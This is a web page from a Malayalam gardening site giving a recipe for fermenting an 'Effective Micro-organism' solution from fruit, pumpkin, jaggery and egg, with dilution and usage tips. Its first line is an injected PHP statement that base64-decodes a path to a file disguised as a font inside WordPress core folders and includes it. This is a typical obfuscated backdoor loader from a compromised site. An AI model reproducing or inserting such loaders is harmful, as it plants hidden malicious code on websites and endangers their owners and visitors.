@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); ഇ എം ലായനി (Effective Micro organism ) | HORTICOPS

ഇ എം ലായനി (Effective Micro organism )

ചെടികളുടെ ആരോഗ്യത്തോടെയുള്ള വളര്ച്ചയ്കും പ്രതിരോധ ശേഷിക്കും ഇത് കുറഞ്ഞ ചെലവിൽ നമുക്കും വീട്ടിലുണ്ടാക്കാം.

ഇ എം ലായിനി എന്താണെന്നും എങ്ങിനെ ഉണ്ടാക്കാമെന്നും നമ്മളിൽ പലർക്കുമറിയാം. എന്നാൽ ചില കാര്യങ്ങള് ശ്രദ്ധിക്കേണ്ടതുണ്ട്.

എന്താണ് ഇ എം ലായനി ?

‘ഇഫക്ടീവ് മൈക്രോ ഓര്ഗാനിസം’ എന്നതിന്റെ ചുരുക്കപ്പേരാണ് ‘ഇ.എം.’ മണ്ണിലെ സൂക്ഷ്മജീവികളുടെ എണ്ണം ഫലപ്രദമായ തോതില് നിലനിര്ത്താനുള്ള നൂതന സാങ്കേതിക വിദ്യയാണിത്. ജൈവവസ്തുക്കള്‍അതിവേഗം വിഘടിക്കാനും ഉപദ്രവകാരികളായ അണുക്കള് നശിക്കാനും വിത്തുകള് വേഗം മുളയ്ക്കാനും തൈകള്‍വേഗം വളരാനുമെല്ലാം ഇത് സഹായിക്കുന്നു. ഈ ലായനി സസ്യവളര്ച്ചയ്ക്കും രോഗപ്രതിരോധത്തിനും വളരെ സഹായകമാകും.

ആവശ്യമായ ചേരുവകള്‍.

(1) പഴുത്ത പപ്പായ – 3 കി.ഗ്രാം

(2) മത്തങ്ങ – 3 കി.ഗ്രാം

(3) പാളയൻ കോടൻ(മൈസൂർ പഴം) – 3 കി.ഗ്രാം

(4) മറയൂർ ശര്ക്കര – 1 കി.ഗ്രാം

(5) നാടൻ കോഴിമുട്ട – 1 എണ്ണം

(6)ശുദ്ധമായ ജലം – 10 ലിറ്റര്‍

ഇ എം ലായനി – ഉണ്ടാക്കുന്ന വിധം .

നല്ലവണ്ണം മൂത്തു പഴുത്ത (നാടൻ ഉത്തമം) പഴങ്ങളും, നാടൻ മഞ്ഞ മത്തങ്ങയുമാണ് ഉപയോഗിക്കേണ്ടത്. കുരുവും തൊലിയും അടക്കം മിക്സിയിലിട്ട് നല്ലവണ്ണം അരച്ചെടുക്കണം. വലിയ പ്ലാസ്റ്റിക് പാത്രത്തില്‍ അരച്ചെടുത്ത പഴങ്ങളുടെ കുഴമ്പ്, പൊട്ടിച്ചെടുത്ത( ഉപ്പില്ലാത്ത കറുത്ത ഉണ്ട ശർക്കര ) ശരക്കര, കോഴിമുട്ട(പൊട്ടിച്ച് ഒഴിക്കണം), ശുദ്ധജലം (കിണർ വെള്ളം ഉത്തമം) എന്നിവയിട്ട് നന്നായി കൂട്ടിയോജിപ്പിക്കുക. പാത്രത്തിന്റെ 50% ഒഴിഞ്ഞുകിടക്കണം. മിശ്രിതം പാത്രത്തില് ആക്കി ക്ലോക്ക്വൈസ് ( വലത്തോട്ട്)ഡയറക്ഷനിൽ നല്ലവണ്ണം ഇളക്കിയശേഷം ഒരു മസ്ലിൻ തുണികൊണ്ട് മൂടി അടച്ച് വെക്കുക. എല്ലാ ദിവസവും ഒരു നേരം ക്ലോക്ക് വൈസ് ഡയറക്ഷനിൽ ഇളക്കി മസ്ലിൻ തുണികൊണ്ട് വീണ്ടും മൂടിക്കെട്ടണം.21 ദിവസം ഇളക്കണം.

വെളുത്ത പാട കെട്ടിയിട്ടുണ്ടെങ്കിൽ എടുത്തു കളയണം. വെളുത്ത പാട കണ്ടില്ലെങ്കിൽ ഒരു കിലോ ശർക്കര കൂടി പൊടിച്ചു ചേർക്കണം.21 ദിവസത്തിനു ശേഷം പാത്രം വായു കടക്കാത്ത വിധം അടച്ചുമൂടി കെട്ടി 20 ദിവസം വക്കണം. ആകെ 41 ദിവസം.

ഇങ്ങനെ തയ്യാറാക്കുന്ന മിശ്രിതം അരിച്ചെടുത്ത് കുപ്പികളിലോ ഭരണികളിലോ സൂക്ഷിക്കാം.

ഇ എം ലായനി – ഉപയോഗ രീതി.

ഈ എം ലായനി – 30 മില്ലി, വെള്ളം – 1 ലിറ്റര് എന്ന അനുപാതത്തിൽ നേര്പ്പിച്ച് ഉപയോഗിക്കാവുന്നതാണ്.

മണ്ണിൽ പ്രയോഗിക്കുവാൻ

400 മില്ലി ഇ.എം.ലായിനി, 1Kg ഉമി ( ഉമി ഉത്തമം) അല്ലെങ്കിൽ അറക്കപൊടി(Sow Dust) കൂട്ടി യോജിപ്പിച്ച് 10 ദിവസം വായു കടക്കാതെ അടച്ചു വക്കുക.

ഇതിൽ നിന്നും 30 മില്ലി ഒരു ലിറ്റർ വെള്ളത്തിൽ കലക്കി ഉപയോഗിക്കാം

ഇത് വിത്ത് പാകുവാനുളള മണ്ണിലും നാലില പ്രായംമുതലുള്ള എല്ലാ സസ്യങ്ങളുടെയും ചുവട്ടിലും ഒഴിച്ചാൽ വിത്തുകൾ ആരോഗ്യത്തോടെ വേഗം മുളയ്കുകയും ചെടികളുടെ പുഷ്ടിയോടെയുള്ള വളര്ച്ചയെ ത്വരിതപ്പെടുത്തുകയും ചെടികൾക്ക് രോഗപ്രതിരോധ ശേഷി നല്കുകയും ചെയ്യും.

ശ്രദ്ധിക്കേണ്ട കാര്യങ്ങൾ

(1) ശുദ്ധമായ ജലം ഉപയോഗിക്കണം. ക്ലോറിൻ കലർന്ന ജലം ഉപയോഗിക്കരുത്.

(2) പഴങ്ങൾ തൊലിയോടെ ചേർക്കുന്നതാണ് കൂടുതൽ ഗുണകരം. കോഴി മുട്ട അധികം പഴക്കമുളളതോ ഫ്രിഡ്ജിൽ വെച്ചതോ ഉപയോഗിക്കരുത്.

(3) പാത്രം കുലുക്കാതെ മുറുക്കെപിടിച്ച് വളരെ സാവധാനം വേണം തുറക്കുവാൻ.. കുറഞ്ഞത് പാത്രത്തിന്റെ പകുതി ഭാഗമെങ്കിലും Fermentation( പുളിക്കൽ പ്രക്രിയ)നടക്കുന്നതിന് ഒഴിഞ്ഞ് കിടക്കണം (വലിയ കന്നാസ് ഉപയോഗിക്കാം )

(4) ഇ എം ലായിനി ചെടികളിൽ തളിക്കുന്ന സമയത്തുമാത്രം വെള്ളം ചേര്ക്കാവു. ഇ എം ലായനി തയാറാക്കി, ആറ് മാസത്തിനു ശേഷം നല്ലവണ്ണം പഴുത്ത പാളയൻ കോടൻ(മൈസൂർ പഴം) പഴം 3 എണ്ണം അതിൽ ഇട്ടു വക്കുക. ഓരോ 6 മാസത്തിലും ഇങ്ങിനെ ചെയ്യണം. ഒരു കൊല്ലത്തിനു ശേഷം പഴത്തിനോടെപ്പം ഒരു കിലോ ശർക്കരയും പൊടിച്ചു ചേർക്കണം. എത്ര കാലം വേണമെങ്കിലും ഇങ്ങിനെ ഉപയോഗിക്കാം. മൂടി തുറന്ന് ഇടയ്ക്ക് ഉള്ളിലുണ്ടാകുന്ന വാതകം പുറത്തുവിടണം.

(5) ദ്രാവക രൂപത്തിലുള്ള ഏത് സൂക്ഷമാണു വളം ഉപയോഗിക്കുമ്പോഴും 5 ദിവസം മുമ്പും 5 ദിവസം ശേഷവും ചെടികൾ നനച്ചിരിക്കണം.

(6) ദ്രാവകരൂപത്തിലുള്ള സൂക്ഷമാണു വളങ്ങളൾ ഒഴിച്ചതിന് ശേഷം ചെടികളുടെ ചുവട്ടില് അല്പംകൂടി‍ വെള്ളം ഒഴിക്കുന്നത് സൂക്ഷമാണുക്കൾ വേഗം മണ്ണിലേക്കും വേരുകളിലേക്കും ചെല്ലുന്നതിന് സഹായകമാണ്.

(7) തണ്ടുകള് നടുന്നതിന് ഉമി ചേർത്ത ലായിനിയാണ് ഉപയോജിക്കേണ്ടത്. തണ്ടിന്റെ ചുവടറ്റം 5 മിനിട്ട്, നേര്പ്പിച്ച ലായനിയില്‍ മുക്കിവെയ്ക്കണം.

ഇ എം ലായിനി എന്തിനെല്ലാം ഉപയോഗിക്കാം

* ചെടികളിൽ തളിക്കാൻ, വിത്തുമുളപ്പിക്കാൻ, മണ്ണിലെ സൂക്ഷ്മജീവികളെ വർദ്ധിപ്പിക്കാൻ

* അടുക്കളയിലേയും, ടോയ്ലററിലേയും, കുളിമുറിയിലേയും ദുർഗന്ധങ്ങളെ അകറ്റാൻ

* ഫാമുകളിലെ ദുർഗന്ധങ്ങള് അകറ്റാൻ

* അടുക്കള കംപോസ്റ്റ് ,പൈപ്പ് കംപോസ്റ്റ് ഇവ ഉണ്ടാക്കാൻ

* മത്സ്യ-മാംസ അവശിഷ്ടങ്ങൾ കംപോസ്റ്റാക്കാനും, അവയുടെ ദുർഗന്ധം അകറ്റാനും

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *